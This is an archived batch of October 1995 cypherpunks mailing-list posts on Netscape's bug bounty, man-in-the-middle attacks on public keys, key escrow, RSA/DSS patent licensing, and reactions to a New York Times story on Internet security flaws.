Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an407769@anon.penet.fi
Date: Wed, 11 Oct 95 19:57:11 PDT
To: cypherpunks@toad.com
Subject: netscape rewards bug finders
Message-ID: <9510120245.AA01029@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


Netscape Offers Rewards To "Bug Catchers"
MOUNTAIN VIEW, CALIFORNIA, U.S.A., 1995 OCT 11 (NB) -- Netscape
Communications Corporation (NASDAQ: NSCP) has announced the "Netscape Bugs
Bounty" program that rewards users who help the company find and report
"bugs" in the beta versions of its recently released Netscape Navigator 2.0
World Wide Web browser software. Users who are the first to report a
particular bug will be rewarded with various prizes depending on its
importance.

The contest begins with the beta versions of Netscape Navigator 2.0 that are
already on the Internet. Full rules for the contest will be available on
Netscape's home page at http://home.netscape.com .

Speaking to Newsbytes, Roseanne Siino a spokesperson for Netscape, said, "As
far as we can determine, this is the first contest of its kind. Netscape's
whole approach to broad-based beta testing on the Internet was new, and we
hope the contest will enliven the beta testing process."

Users who are the first to report a particular bug will be rewarded with
prizes depending on the "bug class." Users reporting "significant security
bugs," as determined by Netscape, will collect cash prizes, while users
finding any security bugs will win Netscape "merchandise." Users finding
other "serious" bugs will be eligible to win "a choice of items" from the
Netscape General Store.

Siino pointed out that there are no caps on winners. Top prize will be $1,000
for any and all bugs in the top category: Severe Security Bugs. To win, the
finder has to be the first, and, according to the company, it is important to
be constantly using the current versions.

The beta versions are available now for downloading on the Internet for free
evaluation. Netscape's beta testing of 2.0 is already underway. Users who
downloaded previous beta versions of the 2.0 software should download today's
versions, which fix major and minor bugs identified since its initial
release, including security bugs in the pre-release version of the Java
language support integrated in 2.0.

Netscape has released special beta versions of 2.0 that include Java for
users wanting to test it. Because bugs will be reported and fixed on an
ongoing basis, Netscape asks users to stay current on the beta version they
are using, so that the latest software is constantly being refined.

"We are continuing to encourage users to provide feedback on new versions of
our software, and the Netscape Bugs Bounty is a natural extension of that
process," said Mike Homer, vice president of marketing at Netscape. "By
rewarding users for quickly identifying and reporting bugs back to us, this
program will encourage an extensive, open review of Netscape Navigator 2.0
and will help us to continue to create products of the highest quality."

Netscape has created two versions of its Netscape Navigator 2.0 beta,
available for downloading from Netscape's home page at
http://home.netscape.com . Version b1J for Windows 95, Solaris, and Irix
platforms includes Java and is for users who want to participate in the
bounty program.

For general users or those on other Unix environments, Windows 3.1, and
Macintosh, Netscape has posted beta versions without Java. After initial
testing is complete, future beta versions for all supported platforms will
contain Java.

(Richard Bowers/19951000/Press Contact: Roseanne Siino, Netscape, 415-254-
1900)
--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 12 Oct 95 00:08:31 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Certificate proposal
In-Reply-To: <199510120147.LAA13833@sweeney.cs.monash.edu.au>
Message-ID: <199510120708.DAA01334@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Jiri "Super Trouper" Baum writes:
> To start a new sub-thread: what if the man in the middle is actually
> a behaviour-modifying parasite? At that stage even a physical meeting
> won't do you much good (the parasite may be otherwise asymptomatic).

Descartes figured there was a benevolent God to bail him out. I believe
otherwise. But I manage to go about my business even while wallowing in a
state of Futplexian doubt.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gjeffers@socketis.net (Gary Jeffers)
Date: Thu, 12 Oct 95 01:16:41 PDT
To: cypherpunks@toad.com
Subject: SUPERWIPE pgp a / uuencode
Message-ID: <199510121156.GAA12642@mail.socketis.net>
MIME-Version: 1.0
Content-Type: text/plain


Dear Cypherpunks,

   I used "PGP - A" to armor SUPERWIPE 1.04R for the first 10 C'punks to
request it. I assumed that all the users would be PGP 'enabled. In case
anyone of you weren't, please make another request for SUPERWIPE & specify
that it be sent with UUENCODE armor & I will resend it with the UUENCODE
armor.
                                          Yours Truly,
                                          Gary Jeffers






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 12 Oct 95 00:30:13 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Judicial Access to Keys (Was: Re: Banque des Cypherpunks)
In-Reply-To: <199510112243.SAA21752@universe.digex.net>
Message-ID: <199510120730.DAA01478@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Scott Brickner writes:
> I don't rember if any key-splitting schemes currently allow it, but how
> about this:  the escrow agencies would be the courts, requiring one
> assent from each judge on the appeals chain.  As each judge rules
> against the defendant or denies the appeal, he adds his piece of the
> key to the ruling.  When you reach the top of the chain, then *and only
> then* can you be traced.

JAK (Judicial Access to Keys) sounds as though it wouldn't give the LEAs a 
chance to pre-emptively snoop on message traffic before prosecution, unlike
POTS wiretaps and Clipper. I don't see the govt. ever favoring such a
scheme that doesn't help the LEAs to "gather" evidence to justify an
indictment. They will probably skip JAK instead <ducking ;>....

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Thu, 12 Oct 95 01:45:30 PDT
To: jirib@cs.monash.edu.au
Subject: Re: Noise: Re: CJR for perl-RSA t-shirt
In-Reply-To: <199510120509.PAA14542@sweeney.cs.monash.edu.au>
Message-ID: <Pine.3.89.9510120439.B29690-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 12 Oct 1995, Jiri Baum wrote:

> > You'd still need an MD5 necktie.
> 
> Actually, you don't - you just don't get signatures without it.
> However, authentication AFAIK was never a problem to export,
> so there's no need to bother.

True, but there's still a licencing requirment in the states (might be 
different up here). So an authentication necktie (as opposed to 
cryptographic shorts and shirts) would be on the principle that one should
not need a licence to write software. 

> Hmm, just like Monopoly money, I guess.
> 
> Nobody's been busted yet for printing that, have they.
They don't care, too easy to counterfeit. Inflation through photocopying
would make monopoly currency as worthless as the funny money it is now.

OTOH, if you threw in strong two-way anon digicash onto a networked version,
you'd basically have a gambling setup masquarading as a MUD. See how long 
that would last unscathed? It would be a nice way to introduce the masses
to the concepts though. Make the code available and you might see servers 
springing up faster than the present digicash casinos. And since any of 
the parties involved might be tempted to cheat ("upgrading" the server in 
the sysadmin's favor, ganging up ...) some authentication might be needed.
Which means even more education for Joe Gambler.

Since doing this for real money, even real digicash, is already illegal 
in many places, it would finally drive home the need for anon security
and crypto to the eager gambler (of which there are many more than eager
pgp users).

If you make it look loony enough, the authorities might find it beneath them
to do anything. Given any success you could launch some additional for-pay 
services based on the same platform.

It's only a game, right?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 12 Oct 95 07:05:56 PDT
To: cypherpunks@toad.com
Subject: Re: MITM evasion MITM evasion
In-Reply-To: <199510112222.SAA21067@universe.digex.net>
Message-ID: <199510121404.HAA07082@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Scott Brickner <sjb@universe.digex.net> writes:

>I see two general categories of MITM attacks.  In one case, Mitch wants
>to eavesdrop on Alice and Bob, but doesn't really care about other
>communication they do.  In the other, Mitch wants to know about all of
>Alice's communications, regardless of with whom they are.

>Public key cryptography turns the first case into two instances of the
>second.  If Mitch doesn't control all of both Alice and Bob's
>communications with everyone, the will eventually discover that the key
>they're using for the other isn't the same one everyone else uses.

This is true, but it doesn't mean that the threat can be neglected.  A
successful MITM attack may be a matter of reading even one message and
acting on it, if the participants don't find out until later that they
were robbed.  In fact, they might not ever notice that they key they
used Tuesday was different from the key they used Thursday, if they
didn't cache the keys.  (Yes, PGP does store the keys in a local key ring
cache but not all systems will necessarily work that way.)

>In the second MITM model, Mitch has an unbelievable task.  Any public
>key that goes from Alice to anyone else, or vice versa, must be
>substituted with one Mitch holds.  Any messages *about* public keys
>must be transformed into messages about the corresponding MITM keys.

>This includes telephone conversations where Alice and Bob exchange
>keyids, the business card Eve has printed with her keyid and gives
>to Alice at Interop, the Betsi key Alice can read in the newspaper,
>WWW pages, files FTP'd, and face-to-face meetings.

Obviously the MITM cannot handle (most) communications taking place
offline.  But there may be a lot of people who don't use any of these
offline methods to validate their keys.  These people don't go to
academic conferences, don't read their key id's over the phone, and
don't print them on business cards (or if they do, they don't get
business cards from those they communicate with securely).  Maybe this
will change, maybe it is a matter of user education, but it is still an
extra effort which will be important to have secure communications.  I
don't think this is widely recognized (other than in the context of the
need for certificates and signed keys).

>Anything short of total control gives Alice an opportunity to learn
>about Mitch's presence.  If Alice can exploit the hole enough to get
>one good key, Mitch must change his tactics to denial of service
>with respect to that key, or Alice can ask the key owner for other
>good keys.

Note too that Mitch is not necessarily taking any risks here even if he
is caught.  "Mitch" could be a remotely operating program, a virus
embedded in Alice's computer or in some link between her system and the
outside world, which is performing these transformations and sending the
decrypted messages out anonymously.  So even if Alice discovers the
trickery there may be no effective way to track down the miscreant.

>If Mitch can successfully surround Alice in such a cloud, I submit
>at least one of the following statements is true:

>1. Alice is such a non-entity that no one really wants to communicate
>with her.

>2. Bob can safely assume that the new key he just got isn't really from
>Alice, because an Alice-with-a-life surrounded by a nearly successful
>Mitch-cloud wouldn't be sending out keys --- she'd be sending out
>messages saying "HELP ME!!  I'M LOCKED IN MITCH'S SECRET BOMB
>SHELTER!!!"

or

3. Mitch's MITM attack is transitory and he doesn't care if he is caught
afterwards, he got his goodies.

or

4. Alice doesn't go to a lot of trouble to check her keys via offline
means.  After all, MITM is so rare it can't happen to her.

Practice safe cryptography!

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 12 Oct 95 04:54:17 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: NYT on Internet Flaws
In-Reply-To: <9510111723.AA17966@all.net>
Message-ID: <199510121157.HAA07110@homeport.org>
MIME-Version: 1.0
Content-Type: text


Dr. Frederick B. Cohen wrote:

| There are alse several papers there on "Internet Holes" under Network
| Security in the same on-line journal.  Every month, another 5-10 holes
| are added to those published in this forum.

	And how many of those holes are published by bugtraq/CERT/8lgm
first? Just curious to see if this is another list I should be on...

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>
Date: Thu, 12 Oct 95 08:06:57 PDT
To: cypherpunks@toad.com
Subject: RSA Data Security, Inc. To Exclusively License Rights to RSA
Message-ID: <9509128135.AA813510342@snail.rsa.com>
MIME-Version: 1.0
Content-Type: text/plain


        Here's the latest press release from my employer.  As was pointed
out earlier, for those who did not already know, Business Wire articles
are written by companies and distributed to news agencies by BW for a fee.
                --Bob Baldwin

______________________________

RSA Data Security, Inc. To Exclusively License Rights to RSA Public Key 
Encryption and Digital Signature Standard (DSS) Technologies; Company Becomes 
One-Stop Worldwide Source for Encryption Technology

REDWOOD CITY, Calif.--(BUSINESS WIRE)--Oct. 12, 1995--RSA Data Security, Inc. 
today announced that it is now licensing patents for the Digital Signature 
Standard (DSS), the U.S. government standard for digital signatures.

RSA also announced that it has renewed its exclusive licensing agreement for the
 industry-standard Rivest-Shamir-Adleman (RSA) public key cryptosystem developed 
 at the Massachusetts Institute of Technology (MIT). With the addition of DSS 
technology to its portfolio of encryption offerings, RSA Data Security has 
become the exclusive source for the industry's most widely accepted security 
technologies.

RSA also announced that under its uniform, non-discriminatory licensing plan, 
manufacturers will pay a one-time royalty when they sell products containing RSA
 and/or DSS technology. No additional per-certificate or use charges are 
required.

`For the first time, the patents covering the most popular encryption and 
digital signature methods in the world, RSA and DSS, are easily available on a 
non-discriminatory basis from a single vendor,` said Jim Bidzos, president of 
RSA. `By offering one-stop shopping for both systems, our customers can 
seamlessly integrate both RSA encryption and DSS digital signature methods into 
their products.` 

Widespread Implementation

Many of RSA's software licensees -- such as Adobe, Aquila, Atalla, National 
Semiconductor, Spyrus, Premenos, Spyglass, Terisa Systems, Frontier 
Technologies, BroadVision, Checkpoint Software, Raptor Systems, SafeCo 
Insurance, Wollongong, Square D, Interval Systems, and Comm-Press -- have 
already requested patent licenses to both the RSA and DSS techniques for use in 
software and hardware systems. IBM and Siemens currently offer DSS-based 
products, licensed under RSA's DSS patent, to the U.S. government.

`Now that vendors can obtain DSS and RSA patents from one source, we expect to 
see companies throughout the U.S., Europe and Japan incorporate RSA and DSS 
technology into dozens of products, including access control systems, network 
management systems, smart cards, link encryptors, and wireless encryption 
devices,` said Bidzos.

`The demand for these technologies is very strong and will continue to grow as 
vendors increasingly incorporate security features into their products. In the 
next several months we expect to be inundated with requests from licensees. This
 is great news for the security industry, which has waited patiently for easy 
availability of the RSA and DSS patents.` 

Digital Signatures

A digital signature on an electronic document is an encrypted form of data 
equivalent to a signature on a printed document, such as a contract or other 
commercial agreement. It verifies that the document is valid and unaltered, and 
that the person signing the document has agreed to its terms.

Furthermore, secure digital signatures cannot be repudiated. The signer of a 
document cannot disown it by claiming it was forged. Both DSS and RSA support 
digital signatures and certificates. Several states, including California and 
Utah have recently enacted legislation recognizing digital signatures as legally
 binding. 

License Availability

Uniform licenses to both the RSA and DSS/Schnorr patents are available 
immediately. The license text, as well as other information regarding these 
patents, is available on RSA Data Security's home page at http://www.rsa.com.

For existing customers of RSA's BSAFE and TIPEM software toolkits, no separate 
patent licenses are required. All rights under the patents to use, integrate and
 copy RSA's software are embedded. 

RSA Data Security, Inc.

RSA Data Security, Inc. is the world's brand name for cryptography, with more 
than 15 million copies of RSA encryption and authentication technologies 
installed and in use worldwide. RSA technologies are part of existing and 
proposed standards for the Internet and World Wide Web, CCITT, ISO, ANSI, IEEE, 
and business, financial and electronic commerce networks around the globe.

The company develops and markets platform-independent developers kits and 
end-user products and provides comprehensive cryptographic consulting services.

Founded in 1982 by the inventors of the RSA Public Key Cryptosystem, the company
 is headquartered in Redwood City, Calif. -0-

Note to Editors: RSA Public Key Cryptosystem, BSAFE and TIPEM are trademarks of 
RSA Data Security, Inc. All other product or company names are trademarks of 
their respective corporations.

For information regarding licensing RSA or DSS patents, contact Paul Livesay at 
RSA Data Security, Inc. (415) 595-8782, or polrsa.com.

For information regarding licensing RSA or DSS toolkits, contact Paul Gordon at 
RSA Data Security, Inc. (415) 595-8782, or paulrsa.com.

--30--kr/sf..

CONTACT: Corman/Croel Marketing & Communications

Patrick Corman, 415/326-9648

cormancerf.net

Lisa Croel, 415/326-0487 lcroelmediacity.com

KEYWORD: CALIFORNIA

INDUSTRY KEYWORD: COMPUTERS/ELECTRONICS COMED TELECOMMUNICATIONS PRODUCT 
REPEATS: New York 212-575-8822 or 800-221-2462; Boston 617-236-4266 or 
800-225-2030; SF 415-986-4422 or 800-227-0845; LA 310-820-9473 BW URL: 
http://www.hnt.com/bizwire

AP-NY-10-12-95 0701EDT


This material is copyrighted and may not be republished without permission of 
the originating newspaper or wire service. NewsHound is a service of the San 
Jose Mercury News. For more information call 1-800-818-NEWS.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Thu, 12 Oct 95 00:12:29 PDT
To: sameer <sameer@c2.org>
Subject: Re: NYT on Internet Flaws
In-Reply-To: <199510120421.VAA29813@infinity.c2.org>
Message-ID: <"swan.cl.cam.:277260:951012071149"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> Not possible. Reporters don't call you for a quote and then send you a draft
> of the article for your approval before they publish. They call for a quote,
> write their article, and publish, not asking for approval.

Depends how well you train them !

If you can get through to them that it is in their interest to get the facts
right, you may find that they get back to you ...
I try to get them to send the draft as email or fax, but instead I get it read
over the phone to me :-(




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Thu, 12 Oct 95 08:21:40 PDT
To: adam@homeport.org
Subject: Re: NYT on Internet Flaws
Message-ID: <9510121517.AA16019@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack sez:
> 
> Dr. Frederick B. Cohen wrote:
> 
> | There are alse several papers there on "Internet Holes" under Network
> | Security in the same on-line journal.  Every month, another 5-10 holes
> | are added to those published in this forum.
> 
> 	And how many of those holes are published by bugtraq/CERT/8lgm
> first? Just curious to see if this is another list I should be on...
> 

Well since I see far less than 5-10 announcements from bugtraq, CERT
and 8lgm put together most months, they must have others.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul A Gauthier <gauthier@CS.Berkeley.EDU>
Date: Thu, 12 Oct 95 08:47:21 PDT
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: NYT on Internet Flaws
In-Reply-To: <307CD9F9.36CE@netscape.com>
Message-ID: <199510121547.IAA02854@moosehead.CS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> Jeff Weinstein wrote:
> > Paul A Gauthier wrote:
> > > Patrick Horgan wrote:
> > > > > From: "K. M. Ellis" <kelli@zeus.towson.edu>
> > > > >
> > > > I'd love to see something in there about most commercial sites being behind
> > > > firewalls without nfs access across the firewall.  This greatly reduces the
> > >
> > >   It might also be worth noting that people accessing the net
> > > via an ISP from home do not typically use NFS either.
> > >
> > 
> > They don't often have the skill/knowledge/concern to verify a PGP checksum
> > to ensure someone didn't patch their browser, either.
> 
>   I don't believe that my posting of PGP signed checksums last night
> is a final solution that will make the world safe for all end users.
> I'm rather insulted that you imply that I do.

That's not what I was saying. The implication of the comments I was
responding to was that "firewalls and ISP users w/o NFS make this whole
issue a non-problem". And I think we all know that's not true. Presumably
if you have a firewall, sure, you have a sysadmin who will check the
integrity of the executable when it is installed behind it.

But ISP users w/o NFS are exactly the unparanoid unwashed masses who would
be perfectly targetted for this type of attack, and even worse would be
the least likely to do checksumming to protect themsevles. That is
the only point I was trying to make.

> your disk, then you may be in trouble.  The point is that you and a
> few reporters are running around yelling at the top of your lungs
> that internet commerce is totally doomed because it is possible for
> users to infect their systems with viruses.

In our post I don't believe there was any yelling, or any serious
doom and gloom. Mainly we just were trying to prod people to internalize
that these old protocols we're all still using are soon going to come under
heavy attack now that there is financial incentive to do it.


>   Perhaps you have a solution to offer to this whole problem?

So I am actually quite fond the idea of a company becoming a well-known
distributor of checksums. Users could either subscribe to a quarterly
bootable CD-ROM which checks out their system. Or a bootable read-only
floppy which causes their modem to call "1-900-CHEKSUM" and download
the needed checksums on demand.

This would be low-cost thing for the user, doing it once every few months
it would be pretty low hassle. Spoofing the phone line is a risk that I
can live with, as can I live with the risk of someone spoofing these
CD-ROMs that are mailed out 4 times a year.

And please, cypherpunks, don't start talking about "oh, but your CMOS
could have a trojan in it", and "do you really trust your boot code
in your SCSI". Because, yes, I sure do trust those things. And I think
it's entirely reasonable to trust them for the purposes we're discussing.

There are of course ways to minimize these attacks through crypto.
If you do have the correct CD-ROM/bood disk it can easily authenticate
the party on the other side of the phone. No phone spoofing.

To minimize the chances of getting a spoofed copy of the disk in
the mail, inclose a magic cookie inside the box. The magic cookie
must appear on the mailing label of the next box otherwise the user
is suspicious. Some other random sugar and now the user can tell if
they are getting legit disks as long as their first disk was legit,
and someone isn't opening their mail in a specific attempt to attack
them.

Paul



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 12 Oct 95 08:56:59 PDT
To: perry@piermont.com
Subject: Re: NYT on Internet Flaws
In-Reply-To: <199510121454.KAA20694@jekyll.piermont.com>
Message-ID: <199510121551.IAA14535@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Well, in addition, universal deployment of Photuris and IPSP would
> probably prevent the sort of active attack being discussed because you
> could no longer replace the packets.

	Do you think the major OS/router vendors are going to
implement IPSP int heir stacks with standing export restrictions? I
don't think so. Seems like that's the thing the article should have
stressed.

> 
> > As for the article - 9/10 scaring people, 1/10 semi-fact.  Be serious?  NFS
> > is not the basic structure of the Internet.  I'm embarrassed that an article
> > so weak in its explanations and so high on fluff appeared on the front page
> > of a well respected newspaper.
> 
> It was suprisingly weak for a John Markoff story (he usually gets the
> details exactly right) but it is an issue that had to be brought up
> and I see no reason to call it a bad article overall. The alarmism is
> needed -- people have to get off their asses (including me).
>  
> Perry
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rubin@faline.bellcore.com (Aviel D Rubin)
Date: Thu, 12 Oct 95 06:06:02 PDT
To: cypherpunks@toad.com
Subject: Follow-up to sci.crypt posting that prompted NYT article
Message-ID: <199510121305.JAA27503@faline.bellcore.com>
MIME-Version: 1.0
Content-Type: text/plain


Yesterday, a New York Times article cited a posting by several
graduate students at Berkeley about the insecurity of the Internet.

We found the sci.crypt posting very interesting and relevant because we 
spent a good portion of the summer working to address the same problem.
Namely, detection of the malicious (or other) modification 
of an executable in transit over an untrusted network. In particular,
we believe that our system could be used to solve the NFS problem
mentioned in the posting from Berkeley.

Our paper can be accessed at

   ftp://thumper.bellcore.com/pub/rubin/stretch.ps

Avi Rubin <rubin@bellcore.com>
Trent Jaeger <jaegert@eecs.umich.edu>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Thu, 12 Oct 95 06:24:18 PDT
To: adam@homeport.org (Adam Shostack)
Subject: Internet holes
In-Reply-To: <199510121157.HAA07110@homeport.org>
Message-ID: <9510121321.AA18371@all.net>
MIME-Version: 1.0
Content-Type: text


> | There are alse several papers there on "Internet Holes" under Network
> | Security in the same on-line journal.  Every month, another 5-10 holes
> | are added to those published in this forum.
> 
> 	And how many of those holes are published by bugtraq/CERT/8lgm
> first? Just curious to see if this is another list I should be on...

I am writing a series of atricles - one per month - for Network Security
Magazine, and am putting lat month's article up as they publish the next
one.  Probably 20% have appeared on bugtraq, etc.

All I am doing is going through the TCP/IP protocols (and other such
stuf) one at a time, writing a short piece on each, describing the most
obvious holes, giving some ideas of how they have been/can be exploited,
and describing in general terms what we might do to fix them.  Next
issue covers NNTP - then comes a 2-month (I think) issue on TCP as a
protocol (lots of holes there) - then whatever strikes my fancy next.  I
figure it will take a few years at this rate to get through the most
important protocols and services.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 12 Oct 95 09:18:41 PDT
To: cypherpunks@toad.com
Subject: Re: Pointer to 10/9/95 EE Times Article
Message-ID: <aca28d2801021004cdec@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:30 PM 10/11/95, Anonymous wrote:

>"According to the group's moderator, who prefers to remain anonymous,
> `The most important means to the defense of privacy is encryption.
> Cypherpunks are therefore devoted to cryptography.  They wish to learn
> about it, to teach it and to implement it.'"
>
>Ok, since when is the Cypherpunk's mailing list moderated?
>
>It is apparent that the author, Larry Lange, has never studied the
>list closely or he would know how amusing this sounds...
>
>(Geez, if he had ever read one of Tim May's posts on the subject... :-)

I have a theory about this.

First, I recognize the style of the quote, as no doubt many of you do.

Second, my guess is that the reporter contacted the person being quoted,
asked "What is your role?," couldn't interpret the answer given, and so
used the only term he understood. Namely, leader or moderator.

Anarchies are tough for hierarchical minds to grasp.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 12 Oct 95 06:48:17 PDT
To: madden@mpi-sb.mpg.de>)
Subject: Re: [NOISE] was Re: java security concerns
In-Reply-To: <199510111335.JAA17959@panix.com>
Message-ID: <199510121346.JAA17394@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Peter Madden) (by way of Duncan Frissell <madden@mpi-sb.mpg.de> writes:
> The real problems lie with specifying the
> program/problem correctly in the first place (so-called specifications
> capture), and with automatic program *synthesis* from specifications
> (which, in mathematical theorem proving terms, presents the problem of
> creating existential objects, as opposed to just verifying that they
> do the right job).

Bugs in specifications are just as easy for humans to produce as bugs
in implementations, and unfortunately there is no way for our machines
to psychically intuit what it was we wanted to specify that they do
any more than we can make them intuit what it was we wanted them to
do.

Remember, by the way, that in some sense a high level programming
language *is* a specification language. Authomatic synthesis from
"specifications" is just a higher level of programming language, with
all that entails.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 12 Oct 95 06:54:22 PDT
To: madden@mpi-sb.mpg.de>)
Subject: Re: [NOISE] was Re: java security concerns
In-Reply-To: <199510111336.JAA17969@panix.com>
Message-ID: <199510121354.JAA17405@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Peter Madden) (by way of Duncan Frissell <madden@mpi-sb.mpg.de> writes:
>  Applications of formal methods in software engineering depend
> critically on the use of automated theorem provers to provide improved
> support for the development of safety critical systems.  Potentially
> catastrophic consequences can derive from the failure of computerized
> systems upon which human lives rely such as medical diagnostic
> systems, air traffic control systems and defence systems (the recent
> failure of the computerized system controlling the London Ambulance
> Service provides an example of how serious software failure can be).

I far prefer trusting robust and failsafe engineering in such
situations. Theorem provers can't account for what happens when the
one in a billion DRAM corruption occurs, or someone kicks the cable
connecting the machine to its disks, or when a nut shoots the sensors,
or whatever. Well built systems fail in a safe manner because of good
engineering design -- as an example, in we hope that the motor
controller might die but the motor won't eat itself anyway no matter
what garbage it puts out. Such design is needed whether the systems
are "formally proven" or not -- and frankly, I can't see formal proofs
having much of an impact given that you are in the end simply shifting
the problem to bug-free specifications and yet still have to worry
about failures in the system.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 12 Oct 95 09:46:07 PDT
To: cypherpunks@toad.com
Subject: Markoff (was: NYT on Internet Flaws)
Message-ID: <aca2918002021004d32c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


(I counted 7 entities copied on the original of this, and have trimmed the
distribution list down to just the Cypherpunks list.)


At 10:23 AM 10/12/95, Mark wrote:
>>> Not possible. Reporters don't call you for a quote and then send you a draft
>>> of the article for your approval before they publish. They call for a quote,
>>> write their article, and publish, not asking for approval.
>>
>>Depends how well you train them !
>
>Lets train them. Someone post their email addresses so we can send them all
>the RFCs for their education. :) They need to know what the hell they are
>talking about.
>
>I wonder if the biology lists get this, some wannabe hero posting how billions
>of people are infected with deadly toxins just because some researcher
>mentioned a well known fact that an amount of various bacteria and toxins
>exist in all living mammals.


John Markoff knows more about crypto and security and knows more of the
folks working in crypto and security than most of us on this list. In
addition to breaking the Clipper story (*), he also has broken several of
the most important crypto/security stories the Net has seen.

(* Though several of us, including myself, saw the precursors to Clipper
many months prior to its announcement.)

I urge folks to check out his many stories on crypto and security in the
NYT before dismissing him as some ignoramus that needs educating.

(Not that we all don't need more educating, often enough.)

Disagreeing with the tone of a story is fine, even disagreeing with the
basic message or facts is normal. After all, we disagree on this list about
many things (witness the MITM debates).

We also now have commerical interests represented on this list in fairly
important ways, so this often raises the stakes--and the temperature--in
disputes.

But disputes are best handled by arguments as to the points in dispute, not
by insults about the ignorance or cluelessness of the folks involved.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Thu, 12 Oct 95 07:18:09 PDT
To: perry@piermont.com
Subject: Re: [NOISE] was Re: java security concerns
In-Reply-To: <199510121354.JAA17405@jekyll.piermont.com>
Message-ID: <9510121415.AA20611@all.net>
MIME-Version: 1.0
Content-Type: text


> Peter Madden) (by way of Duncan Frissell <madden@mpi-sb.mpg.de> writes:
> >  Applications of formal methods in software engineering depend
> > critically on the use of automated theorem provers to provide improved
> > support for the development of safety critical systems.  Potentially
> > catastrophic consequences can derive from the failure of computerized
> > systems upon which human lives rely such as medical diagnostic
